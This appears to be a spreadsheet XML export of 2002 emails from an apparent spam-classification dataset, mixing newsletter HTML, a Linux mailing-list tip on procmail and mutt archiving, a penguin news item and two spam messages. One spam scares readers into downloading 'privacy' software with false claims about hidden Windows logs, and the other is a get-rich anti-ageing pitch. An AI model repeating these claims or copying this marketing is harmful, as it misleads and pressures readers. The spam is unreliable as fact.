 &lt;li&gt;Format: B&amp;amp;W, Widescreen Anamorphic, Closed Captioned
 &lt;li&gt;Sound: Dolby Digital 5.1, Dolby Digital 2.0 Surround Spanish, Dolby Digital 2.0 Surround French
 &lt;li&gt;Billy Bob Thornton, Joel Coen and Ethan Coen Commentary
 &lt;li&gt;Deleted Scenes
 &lt;li&gt;Making-of Featurette
 &lt;li&gt;Interview with Director of Photography Roger Deakins
 &lt;li&gt;Photo Gallery
 &lt;li&gt;Trailers
 &lt;/ul&gt;
 &lt;p class="url" align="right"&gt;Review by &lt;a href="mailto:brett@lockergnome.com?subject=DVD Review Feedback"&gt;Brett Trout&lt;/a&gt;
 &lt;!-- WALLPAPER --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table bgcolor="#A9C4CF" border="0" cellspacing="0" cellpadding="0" width="100%"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="title"&gt;&amp;nbsp;GnomeWALLPAPER&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- http://www.deviantart.com/output/lockergnome_newsletter-skin.html --&gt;
 &lt;!-- Begin Featured Skin --&gt;
 &lt;span class="author"&gt;&lt;b&gt;Isolation for &lt;a title="Photo Manipulation  Website" target=_blank HREF="http://www.deskmod.com/?show=showcat&amp;cat_name=photo" &gt;Photo Manipulation&lt;/a&gt;&lt;/b&gt; by fake[x]&lt;/span&gt;&lt;br&gt;
 &lt;img height=6 src="images/blank.gif" width=1&gt;
 &lt;font size="1"&gt;Posted on  7/14/02 11:08PM  -- &amp;nbsp;&amp;nbsp; &lt;/font&gt;
 &lt;p align="center"&gt;
 &lt;center&gt;&lt;img BORDER=0 SRC="http://www.deskmod.com/backend/deskmod/lncache/12529.gif" ALT="Photo Manipulation by fake[x]"&gt;&lt;/center&gt;
 &lt;p&gt;&lt;/p&gt;&lt;p align="center"&gt;
 &lt;font size="2"&gt;
 [&lt;a title="Download Isolation" HREF="http://www.deskmod.com/?download=12529" &gt;Download&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="View Large Image"  target=_blank HREF="http://www.deskmod.com/?state=view&amp;skin_id=12529" &gt;Zoom&lt;/a&gt;]
 &amp;nbsp;--&amp;nbsp;[&lt;a title="Visit DeskMod" target=_blank HREF="http://www.deskmod.com" &gt;Visit DeskMod&lt;/a&gt;]
 &lt;/font&gt;&lt;/p&gt;&lt;br&gt;
 &lt;!-- End Featured Skin --&gt;
 &lt;!-- ADMINISTRIVIA --&gt;
 &lt;p&gt;&lt;br&gt;&lt;table cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;
 &lt;table bgcolor="#A9C4CF" cellpadding="7" cellspacing="0" border="0"&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Helvetica, Arial" size="1"&gt;
 &lt;a href="http://www.lockergnome.com/issues/digitalmedia/20020715.html"&gt;http://www.lockergnome.com/issues/digitalmedia/20020715.html&lt;/a&gt;&lt;br&gt;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HREF="http://www.gnomedex.com/"&gt;Geekathon 2002&lt;/A&gt;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HREF="http://lockergnome.pricegrabber.com/"&gt;The GnomeSHOPPER&lt;/A&gt;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&amp;nbsp;&lt;a href="http://www.lockergnome.com/recommend.html"&gt;Recommend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href="http://www.lockergnome.com/submit.html"&gt;Submit Your Opinion&lt;/a&gt;&lt;br&gt;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HREF="http://www.amazon.com/exec/obidos/ASIN/0966103254/ref=ase_lockergnome/"&gt;Get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href="mailto:jake@lockergnome.com?subject=Lockergnome Digital Media Comment"&gt;E-mail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&lt;p&gt;&lt;br&gt;
 &lt;font style="font-size: 8pt" face="Verdana, Tahoma, Arial" size="1"&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.lockergnome.com/webcam.html"&gt;
 &lt;img width="125" height="94" alt="Lockergnome Webcam Image" src="http://www.lockergnome.com/images/webcam/jakecam.jpg"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td align="center"&gt;&lt;font size="1" face="Tahoma,Arial"&gt;CLICK HERE TO ZOOM&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/font&gt;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class="sidebar"&gt;GNOMEMUSIC&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table border="0"&gt;&lt;tr&gt;&lt;td&gt;&lt;a href="http://www.netmusiccountdown.com"&gt;
 &lt;img border="0" alt="Net Music Countdown" src="http://images.lockergnome.com/images/nmclogo.gif"&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;p&gt;&lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1s21go"
 target=_blank&gt;&lt;b&gt;Goo Goo Goes Disney&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The Goo Goo Dolls have had some of their most successful songs come out of movies, so it's not a big leap to see...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1z17le"
 target=_blank&gt;&lt;b&gt;Lenny Paints Town Pink&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Lenny Kravitz and Pink are gearing up to hit the road. The U.S. leg of Lenny Live kicks off today in Virginia Beach...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1d41da"
 target=_blank&gt;&lt;b&gt;Up On the Roof&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Oh, the difference a preposition makes. Dave Matthews Band will launch their new album, Busted Stuff, on the Ed...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1w13li"
 target=_blank&gt;&lt;b&gt;Bow Wow Wants to Bark-Play-For Duke&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 The rapper formerly known as Lil (he's dropped the Lil) Bow Wow says he's like to play basketball in college and...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1n13wh"
 target=_blank&gt;&lt;b&gt;Whitney's New Song Leaked&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Whitney Houston needs a hit and she's hoping "Whatcha Lookin' At" is it. The song was leaked over New York radio...
 &lt;br&gt;
 &lt;br&gt;
 &lt;a href="http://netmusiccountdown.com/news/article.php?id=1e10fa"
 target=_blank&gt;&lt;b&gt;Fat Joe in Bar Fight&lt;/b&gt;&lt;/a&gt;
 &lt;br&gt;
 Rapper Fat Joe - real name Joseph Cartagena - is charged with breaking a man's jaw during a bar fight in B.B. King's... 
 &lt;p&gt;&amp;nbsp;&lt;p&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="100%" bgcolor="#FFEEDD"&gt;&lt;tr&gt;&lt;td&gt;&lt;p class="sidebar"&gt;GNOMECREDITS&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;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&lt;p&gt;&amp;nbsp;&lt;p&gt;&amp;nbsp;Search Past Issues:&lt;br&gt;
 &lt;img src="http://images.lockergnome.com/images/blank.gif"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
 &lt;center&gt;&lt;a href="http://www.gnomedex.com/"&gt;&lt;img src="http://www.lockergnome.com/images/ads/gnomedex_vert.gif" width="125" height="400" border="0"&gt;&lt;/a&gt;&lt;/center&gt;
 &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;&lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Re: Mutt + Outbox
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 27 Jul 2002, kevin lyda wrote:
 &gt; saw this on mutt users.  might be a handy trick for those of with
 &gt; hyperactive archiving genes...  :)
 &gt; 
 &gt; this might work better in this long run though:
 &gt; 
 &gt;    set record='~/Mail/outbox-`date "+%Y-%m"`'
 A nice followon of this for the obsessive archiver is:
 Procmail:
 .procmail/rc.mail
 	&lt;snip&gt;
 	:0:
 	* ^Subject.*\[ILUG\]
 	:ilug-`date "+%m-%Y"`
 	&lt;snip&gt;
 and Mutt:
 .muttrc:
 	mailboxes =ilug-`date "+%m-%Y"` 
 does mean threads get broken at the start of the month though :(
 Gavin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Keep your private life private. EZ Internet Privacy
</t>
  </si>
  <si>
    <t xml:space="preserve">Computer Privacy Help elizabeth0318 ,
 &lt;html&gt;
 &lt;body&gt;
 &lt;p&gt;&lt;font face="Arial" size="2"&gt;YOUR INTERNET USAGE IS BEING TRACKED&lt;br&gt;
 You have no privacy protection.&lt;br&gt;
 Will your BOSS, WIFE or KIDS find out?&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;/font&gt;&lt;b&gt;&lt;font face="Arial"&gt;
 &lt;a href="http://www185.wiildaccess.com/"&gt;DOWNLOAD EZ INTERNET PRIVACY SOFTWARE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;
 &lt;br&gt;
 +++++++++++++++++++++++++++++++++++++++++++&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 You're in Serious Trouble - It's a Proven Fact!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Deleting &amp;quot;Internet Cache and History&amp;quot; will NOT protect you because any of&lt;br&gt;
 the Web Pages, Pictures, Movies, Videos, Sounds, E-mail, Chat Logs and&lt;br&gt;
 Everything Else you see or do could easily be recovered to Haunt you&lt;br&gt;
 forever! How would you feel if a snoop made this information public to your&lt;br&gt;
 Spouse, Mother &amp;amp; Father, Neighbors, Children, Boss or the Media? It could&lt;br&gt;
 easily Ruin Your Life! Solve all your problems and enjoy all the benefits of&lt;br&gt;
 an &amp;quot;As New PC&amp;quot;, EZ INTERNET PRIVACY SOFTWARE can Speed-Up your PC/Internet Browser,&lt;br&gt;
 reclaim Hard Disk space and Professionally Clean your PC in one easy mouse&lt;br&gt;
 click!&lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 Did you know for example that every click you make on Windows 98 Start Menu&lt;br&gt;
 is logged and stored permanently on a hidden encrypted database within your&lt;br&gt;
 own computer?&lt;br&gt;
 Deleting &amp;quot;internet cache and history&amp;quot;, will not protect you... your PC is&lt;br&gt;
 keeping frightening records of both your online and off-line activity. Any&lt;br&gt;
 of the Web Pages, Pictures, Movies, Videos, Sounds, E-mail and Everything&lt;br&gt;
 Else you or anyone else have ever viewed could easily be recovered - even&lt;br&gt;
 many years later!&lt;br&gt;
 How would you feel if somebody snooped this information out of your computer&lt;br&gt;
 and made it public?&lt;br&gt;
 Do your children or their friends use your computers? What have they&lt;br&gt;
 downloaded and tried to delete?&lt;br&gt;
 Act now! And stop these files coming &amp;quot;back from the dead&amp;quot; to haunt you!&lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Arial" size="5"&gt;&lt;a href="http://www185.wiildaccess.com/"&gt;CLICK 
 HERE&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;font size="2"&gt;to be removed &lt;a href="http://www185.wiildaccess.com/takemeoff.html"&gt;Click Here&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;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</si>
  <si>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[zzzzteana] 'Lost' penguins found alive
</t>
  </si>
  <si>
    <t xml:space="preserve">Evening Standard - 28 August 2002
 [Deft use of Fortean Unit of Measurement in 2nd para - MA]
  'Lost' penguins found alive
  by Charles Miranda
  A colony of emperor penguins which was thought to have starved to death in
  Antarctica has been found alive in a "big huddle". 
  The birds were spotted by the crew of a USAF jet returning to base in New
  Zealand. Researchers had feared that a breakaway iceberg the size of Jamaica
  had all but wiped out the colony at Cape Crozier on Ross Island. 
  Thousands of chicks are believed to have died as an increase in sea ice made
  it impossible for the adults to find food. A detailed count is planned in
  October. Antarctica (New Zealand) chief executive Lou Sanson said: "The
  penguins were in a big huddle. We can now hope that the emperors have had a
  successful breeding season over the winter." 
  Some 1,000 pairs of emperors - the largest penguins in the world at 3.3ft tall
  and 88lb - usually nest at Cape Crozier, 50 miles from the US McMurdo research
  station. The 200,000-strong Adelie penguin colony, which also nests at the
  cape, may have lost up to third of its population. 
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/MVfIAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Africa's deserts are in "spectacular" retreat
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-3,8015193,1440/
 Date: Not supplied
 A new analysis of satellite images shows regeneration of once arid lands across 
 the southern Sahara, making farming viable again
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [fm-news] Newsletter for Tuesday, July 30th 2002
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: How unlucky can you get?
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002, Jim Whitehead wrote:
 --]a sledgehammer)? We hadn't done anything unusual to the toilet in the recent
 --]past -- just normal use. I've *never* heard of this happening to anyone I
 --]know. The guts, yeah, they fail all the time. But the storage bowl -- never.
 --]
 Do you have any Tesla nuts inthe hood? Them hooligans and thier beams..
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: LOOKING FOR LEADERS IN YOUR AREA
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_244_43836275737818467044071
 Content-Type: text/plain;
 	charset="us-ascii"
 Content-Transfer-Encoding: quoted-printable
 &lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 =
 &lt;html xmlns:o=3D"urn:schemas-microsoft-com:office:office"
 =
 xmlns:w=3D"urn:schemas-microsoft-com:office:word"
 =
 xmlns=3D"http://www.w3.org/TR/REC-html40"&gt;
 =
 =
 &lt;head&gt;
 =
 &lt;meta http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-1252"&gt;
 =
 &lt;meta name=3DProgId content=3DWord.Document&gt;
 =
 &lt;meta name=3DGenerator content=3D"Microsoft Word 9"&gt;
 =
 &lt;meta name=3DOriginator content=3D"Microsoft Word 9"&gt;
 =
 &lt;link rel=3DFile-List
 =
 href=3D"./PROFIT%20FROM%20THE%20BOOMERS-july%209_files/filelist.xml"&gt;
 =
 &lt;title&gt;HOW DO I PROFIT FROM THE BOOMERS &lt;/title&gt;
 =
 &lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 =
  &lt;o:DocumentProperties&gt;
 =
   &lt;o:Author&gt;Val Curl&lt;/o:Author&gt;
 =
   &lt;o:Template&gt;Normal&lt;/o:Template&gt;
 =
   &lt;o:LastAuthor&gt;Val Curl&lt;/o:LastAuthor&gt;
 =
   &lt;o:Revision&gt;2&lt;/o:Revision&gt;
 =
   &lt;o:TotalTime&gt;95&lt;/o:TotalTime&gt;
 =
   &lt;o:Created&gt;2002-07-13T21:21:00Z&lt;/o:Created&gt;
 =
   &lt;o:LastSaved&gt;2002-07-13T21:21:00Z&lt;/o:LastSaved&gt;
 =
   &lt;o:Pages&gt;2&lt;/o:Pages&gt;
 =
   &lt;o:Words&gt;333&lt;/o:Words&gt;
 =
   &lt;o:Characters&gt;1903&lt;/o:Characters&gt;
 =
   &lt;o:Lines&gt;15&lt;/o:Lines&gt;
 =
   &lt;o:Paragraphs&gt;3&lt;/o:Paragraphs&gt;
 =
   &lt;o:CharactersWithSpaces&gt;2337&lt;/o:CharactersWithSpaces&gt;
 =
   &lt;o:Version&gt;9.2720&lt;/o:Version&gt;
 =
  &lt;/o:DocumentProperties&gt;
 =
 &lt;/xml&gt;&lt;![endif]--&gt;
 =
 &lt;style&gt;
 =
 &lt;!--
 =
  /* Font Definitions */
 =
 @font-face
 =
 	{font-family:"Lucida Handwriting";
 =
 	panose-1:3 1 1 1 1 1 1 1 1 1;
 =
 	mso-font-charset:0;
 =
 	mso-generic-font-family:script;
 =
 	mso-font-pitch:variable;
 =
 	mso-font-signature:3 0 0 0 1 0;}
 =
 @font-face
 =
 	{font-family:Impact;
 =
 	panose-1:2 11 8 6 3 9 2 5 2 4;
 =
 	mso-font-charset:0;
 =
 	mso-generic-font-family:swiss;
 =
 	mso-font-pitch:variable;
 =
 	mso-font-signature:647 0 0 0 159 0;}
 =
  /* Style Definitions */
 =
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 =
 	{mso-style-parent:"";
 =
 	margin:0in;
 =
 	margin-bottom:.0001pt;
 =
 	mso-pagination:widow-orphan;
 =
 	font-size:12.0pt;
 =
 	font-family:"Times New Roman";
 =
 	mso-fareast-font-family:"Times New Roman";}
 =
 p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
 =
 	{margin:0in;
 =
 	margin-bottom:.0001pt;
 =
 	text-align:center;
 =
 	mso-pagination:widow-orphan;
 =
 	font-size:12.0pt;
 =
 	font-family:Arial;
 =
 	mso-fareast-font-family:"Times New Roman";}
 =
 p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
 =
 	{margin:0in;
 =
 	margin-bottom:.0001pt;
 =
 	text-align:center;
 =
 	mso-pagination:widow-orphan;
 =
 	font-size:28.0pt;
 =
 	mso-bidi-font-size:12.0pt;
 =
 	font-family:Impact;
 =
 	mso-fareast-font-family:"Times New Roman";
 =
 	mso-bidi-font-family:Arial;
 =
 	color:purple;}
 =
 a:link, span.MsoHyperlink
 =
 	{color:blue;
 =
 	text-decoration:underline;
 =
 	text-underline:single;}
 =
 a:visited, span.MsoHyperlinkFollowed
 =
 	{color:purple;
 =
 	text-decoration:underline;
 =
 	text-underline:single;}
 =
 @page Section1
 =
 	{size:8.5in 11.0in;
 =
 	margin:.6in .6in .6in .6in;
 =
 	mso-header-margin:.2in;
 =
 	mso-footer-margin:.2in;
 =
 	mso-paper-source:0;}
 =
 div.Section1
 =
 	{page:Section1;}
 =
 --&gt;
 =
 &lt;/style&gt;
 =
 &lt;/head&gt;
 =
 =
 &lt;body lang=3DEN-US link=3Dblue vlink=3Dpurple style=3D'tab-interval:.5in'&gt;
 =
 =
 &lt;div class=3DSection1&gt;
 =
 =
 &lt;p class=3DMsoBodyText2&gt;&lt;span style=3D'font-size:36.0pt;mso-bidi-font-size:12.=
 0pt'&gt;HOW
 =
 DO I PROFIT FROM THE&lt;br&gt;
 =
 90 MILLION BABY BOOMERS ?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center'&gt;&lt;span
 =
 style=3D'color:#666699'&gt;--------------------------------------------------------=
 --------------------------------------------------------&lt;br
 =
 style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![if !supportLineBreakNewLine]&gt;&lt;br style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![endif]&gt;&lt;/span&gt;&lt;span style=3D'font-family:Arial'&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoBodyText&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.=
 0pt;
 =
 color:#666699'&gt;Become an &lt;u&gt;EXCLUSIVE&lt;/u&gt; &lt;u&gt;PROVIDER&lt;/u&gt; of a&lt;br&gt;
 =
 LOOK YOUNGER PRODUCT&lt;br&gt;
 =
 that the Boomers &lt;u&gt;WANT&lt;/u&gt; !&lt;/span&gt;&lt;/b&gt;&lt;span style=3D'color:#666699'&gt;&lt;br&gt;
 =
 &lt;br&gt;
 =
 &lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;Provide
 =
 a &lt;u&gt;PATENTED&lt;/u&gt; product that successfully addresses&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:20.0pt;mso-bidi-font-size:12.0pt;=
 font-family:"Lucida Handwriting";
 =
 color:fuchsia'&gt;Wrinkles, Dark Circles, Age Spots, Fine Lines, Cellulite, =
 Spider
 =
 Veins, and MORE !&lt;/span&gt;&lt;/b&gt;&lt;span style=3D'font-size:20.0pt;mso-bidi-font-size:
 =
 12.0pt;color:fuchsia'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;Provide
 =
 an AFFORDABLE, &lt;u&gt;HEALTHY&lt;/u&gt; product that&lt;br&gt;
 =
 shows &lt;u&gt;FAST RESULTS&lt;/u&gt; on the OUTSIDE of the body&lt;br&gt;
 =
 while providing the proven benefits of&lt;br&gt;
 =
 SUPER ANTIOXIDANTS at the cellular level !&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;span style=3D'color:#666699'&gt;&lt;br&gt;
 =
 ------------------------------------------------------------------------------=
 ----------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:24.0pt;mso-bidi-font-size:12.0pt;color:#666699'&gt;We =
 &lt;u&gt;ALL&lt;/u&gt;
 =
 know that&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
 =
 &lt;span style=3D'font-size:48.0pt;mso-bidi-font-size:12.0pt;font-family:Impact;
 =
 color:fuchsia'&gt;VANITY SELLS !&lt;/span&gt;&lt;span style=3D'font-size:24.0pt;=
 mso-bidi-font-size:
 =
 12.0pt;font-family:Impact;color:fuchsia'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;span =
 style=3D'color:#666699'&gt;---------------------------------------------------------=
 -------------------------------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;u&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;WHY
 =
 NOT&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;
 =
 color:#666699'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;
 =
 color:fuchsia'&gt;LOOK TEN YEARS YOUNGER and &lt;u&gt;GET PAID FOR IT&lt;/u&gt; ?=
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span
 =
 style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;color:#993366'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;span =
 style=3D'color:#666699'&gt;---------------------------------------------------------=
 -------------------------------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:20.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;THIS
 =
 BOOMER PHENOMENON IS HAPPENING&lt;br&gt;
 =
 WITH or WITHOUT&lt;br&gt;
 =
 YOU or ME &lt;br&gt;
 =
 &lt;br&gt;
 =
 THIS RECEPTIVE MARKETPLACE WILL CREATE&lt;/span&gt;&lt;/b&gt;&lt;span =
 style=3D'color:#FF99CC'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;span style=3D'font-size:36.0pt;mso-bidi-font-size:12.0pt;font-family:
 =
 Impact;color:fuchsia'&gt;MILLIONAIRES !!!&lt;/span&gt;&lt;span style=3D'font-size:36.0pt;
 =
 mso-bidi-font-size:12.0pt;font-family:Impact'&gt;&lt;br&gt;
 =
 &lt;br&gt;
 =
 &lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;span style=3D'font-size:26.0pt;mso-bidi-font-size:12.0pt;
 =
 color:#666699'&gt;WHY NOT&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span style=3D'font-size:26.0pt;
 =
 mso-bidi-font-size:12.0pt;color:#666699'&gt; BE ONE OF THEM ?&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 =
 &lt;span =
 style=3D'color:#666699'&gt;---------------------------------------------------------=
 -------------------------------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;span style=3D'font-size:48.0pt;mso-bidi-font-size:12.0pt;font-family:Impact;
 =
 color:fuchsia'&gt;&lt;a href=3D"mailto:go@tytcorp.com"&gt;&lt;span style=3D'color:
 =
 fuchsia'&gt;CLICK HERE&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:48.0pt;
 =
 mso-bidi-font-size:12.0pt'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:16.0pt;mso-bidi-font-size:12.0pt'&gt;with =
 &lt;/span&gt;&lt;/b&gt;&lt;span
 =
 style=3D'font-size:24.0pt;mso-bidi-font-size:12.0pt;font-family:Impact;
 =
 color:#666699'&gt;Im Your Leader&lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:16.0pt;
 =
 mso-bidi-font-size:12.0pt'&gt; or &lt;/span&gt;&lt;/b&gt;&lt;span style=3D'font-size:24.0pt;
 =
 mso-bidi-font-size:12.0pt;font-family:Impact;color:#666699'&gt;Product =
 Only&lt;/span&gt;&lt;b&gt;&lt;span
 =
 style=3D'font-size:16.0pt;mso-bidi-font-size:12.0pt'&gt; in the Subject Line&lt;br&gt;
 =
 &lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;
 =
 color:#666699'&gt;You Will be emailed information sufficient for you to make an
 =
 Educated Business Decision as to whether this phenomenon is something you =
 want
 =
 to pursue or not &lt;br&gt;
 =
 NO HYPE / NO OBLIGATION&lt;br style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![if !supportLineBreakNewLine]&gt;&lt;br style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoBodyText&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.=
 0pt;
 =
 color:#666699'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;!=
 [endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 =
 =
 &lt;p =
 class=3DMsoNormal&gt;---------------------------------------------------------------=
 -------------------------------------------------------------------&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoBodyText&gt;&lt;span style=3D'font-size:10.0pt;mso-bidi-font-size:8.=
 0pt'&gt;Your
 =
 email address was obtained from an opt-in list.&lt;span style=3D"mso-spacerun:
 =
 yes"&gt; &lt;/span&gt;If you wish to unsubscribe from this list please Click on =
 REMOVE
 =
 ME, below, and Click send.&lt;/span&gt;&lt;span style=3D'font-size:10.0pt;=
 mso-bidi-font-size:
 =
 7.5pt'&gt;&lt;br&gt;
 =
 TO BE REMOVED:&lt;span style=3D"mso-spacerun: yes"&gt; &lt;/span&gt;PLEASE &lt;u&gt;DO NOT&lt;/u&gt;
 =
 CLICK ON THE REPLY BUTTON &lt;br&gt;
 =
 JUST &lt;u&gt;CLICK HERE&lt;/u&gt; AT &lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:16.0pt;=
 mso-bidi-font-size:
 =
 10.0pt'&gt;&lt;a href=3D"mailto:remove@nouce1.com"&gt;REMOVE ME&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;span
 =
 style=3D'font-size:10.0pt;mso-bidi-font-size:7.5pt'&gt; with &amp;quot;REMOVE ME&amp;quot;
 =
 in Subject Line. You will be immediately and permanently removed from this
 =
 database, and please accept our apologies for any inconvenience. BEST OF
 =
 SUCCESS IN WHATEVER YOU CHOOSE TO DO IN LIFE!&lt;br&gt;
 =
 &lt;/span&gt;-----------------------------------------------------------------------=
 -----------------------------------------------------------&lt;span
 =
 style=3D'color:#666699'&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 =
 =
 &lt;/div&gt;
 =
 =
 &lt;/body&gt;
 =
 =
 &lt;/html&gt;
 =
 ------=_NextPart_244_43836275737818467044071
 Content-Type: text/html;
 	charset="us-ascii"
 Content-Transfer-Encoding: Quoted-Printable
 &lt;!-- saved from url=3D(0022)http://internet.e-mail --&gt;
 =
 &lt;html xmlns:o=3D"urn:schemas-microsoft-com:office:office"
 =
 xmlns:w=3D"urn:schemas-microsoft-com:office:word"
 =
 xmlns=3D"http://www.w3.org/TR/REC-html40"&gt;
 =
 =
 &lt;head&gt;
